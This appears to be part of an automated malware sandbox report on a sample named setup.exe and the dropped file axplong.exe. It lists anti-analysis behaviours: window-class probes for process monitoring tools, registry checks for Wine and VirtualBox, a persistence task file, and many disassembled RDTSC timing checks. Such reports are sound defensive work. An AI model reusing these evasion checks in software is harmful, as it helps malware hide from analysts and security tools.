                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: CBEC99 second address: CBEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4A265 second address: E4A280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B22h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E496BA second address: E496CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FE0B4F44DC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d jl 00007FE0B4F44DC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E49817 second address: E4984A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE0B4522B2Ch 0x0000000f jmp 00007FE0B4522B26h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4984A second address: E4986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007FE0B4F44DC6h 0x00000015 pop ecx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E499D2 second address: E499F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4522B21h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FE0B4522B1Eh 0x00000011 jg 00007FE0B4522B16h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E499F9 second address: E49A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C924 second address: E4C93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C93A second address: E4C94D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C9A9 second address: E4C9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C9AE second address: E4C9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DD1h 0x00000008 jg 00007FE0B4F44DC6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FE0B4F44DD1h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C9DF second address: E4C9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4C9E6 second address: E4CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dx, 3EE4h 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D3A9Eh] 0x00000014 jnl 00007FE0B4F44DD0h 0x0000001a push D9332C49h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jnp 00007FE0B4F44DC6h 0x00000028 pop edx 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CBBF second address: E4CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CBCB second address: E4CBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CC32 second address: E4CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BC3h], eax 0x00000011 or di, 0107h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D3801h], ecx 0x0000001e push 836EBDB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007FE0B4522B1Ch 0x0000002b ja 00007FE0B4522B16h 0x00000031 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CC63 second address: E4CC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CC6A second address: E4CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7C9142CDh 0x0000000e mov dword ptr [ebp+122D1C93h], edi 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D38F6h] 0x0000001c call 00007FE0B4522B27h 0x00000021 ja 00007FE0B4522B1Ch 0x00000027 mov edi, dword ptr [ebp+122D39DAh] 0x0000002d pop edx 0x0000002e push 00000000h 0x00000030 add dword ptr [ebp+122D3801h], edx 0x00000036 push 00000003h 0x00000038 jne 00007FE0B4522B1Ch 0x0000003e push 7A6F6830h 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E4CCC9 second address: E4CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD5h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 459097D0h 0x00000018 mov edx, dword ptr [ebp+122D38C2h] 0x0000001e lea ebx, dword ptr [ebp+1246188Ah] 0x00000024 sub dword ptr [ebp+122D1CC7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E5EF42 second address: E5EF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FE0B4522B1Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6B889 second address: E6B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE0B4F44DCEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007FE0B4F44DD3h 0x00000015 popad 0x00000016 push ebx 0x00000017 push esi 0x00000018 jp 00007FE0B4F44DC6h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6B8C5 second address: E6B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BBB3 second address: E6BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BBB9 second address: E6BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BBBD second address: E6BBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BD07 second address: E6BD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 jng 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BFCB second address: E6BFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4F44DCBh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop ebx 0x0000000f jnc 00007FE0B4F44DE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BFEC second address: E6BFFE instructions: 0x00000000 rdtsc 0x00000002 js 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FE0B4522B16h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6BFFE second address: E6C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6C11D second address: E6C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE0B4522B16h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE0B4522B22h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6C2F7 second address: E6C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE0B4F44DC6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6C302 second address: E6C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4522B22h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6C5A7 second address: E6C5B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE0B4F44DC6h 0x00000009 jl 00007FE0B4F44DC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E34479 second address: E3447D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3447D second address: E34483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6CB59 second address: E6CB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6CB5D second address: E6CB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCDh 0x00000008 jc 00007FE0B4F44DC6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D0DB second address: E6D10C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0B4522B16h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4522B28h 0x00000014 jmp 00007FE0B4522B1Ah 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D10C second address: E6D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D112 second address: E6D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D4DE second address: E6D4E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE0B4F44DCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D4E8 second address: E6D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4522B26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jc 00007FE0B4522B22h 0x00000014 jmp 00007FE0B4522B1Ch 0x00000019 push esi 0x0000001a jmp 00007FE0B4522B27h 0x0000001f pop esi 0x00000020 pushad 0x00000021 jmp 00007FE0B4522B24h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D7EA second address: E6D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE0B4F44DC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6D7F7 second address: E6D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E70CE1 second address: E70CE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E70CE6 second address: E70D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FE0B4522B2Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FE0B4522B28h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jo 00007FE0B4522B1Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E70D31 second address: E70D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCCh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FE0B4F44DCCh 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E6FBB9 second address: E6FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E70E1A second address: E70E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E777CA second address: E777D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E777D0 second address: E777D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77950 second address: E77954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77A9E second address: E77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 js 00007FE0B4F44DC6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AB7 second address: E77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AC1 second address: E77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77ACB second address: E77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77ADF second address: E77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AE3 second address: E77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E77AE9 second address: E77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7801D second address: E78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E78021 second address: E78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DD7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E78052 second address: E78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E782EA second address: E78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FE0B4F44DC6h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79E76 second address: E79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79F53 second address: E79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E79F57 second address: E79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A043 second address: E7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A049 second address: E7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5C9 second address: E7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5D3 second address: E7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A5D9 second address: E7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7A7C6 second address: E7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7AE9D second address: E7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FE0B4F44DC8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FE0B4F44DCEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FE0B4F44DC8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007FE0B4F44DCCh 0x00000047 jp 00007FE0B4F44DCCh 0x0000004d jnc 00007FE0B4F44DC6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B954 second address: E7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B958 second address: E7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7B95C second address: E7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
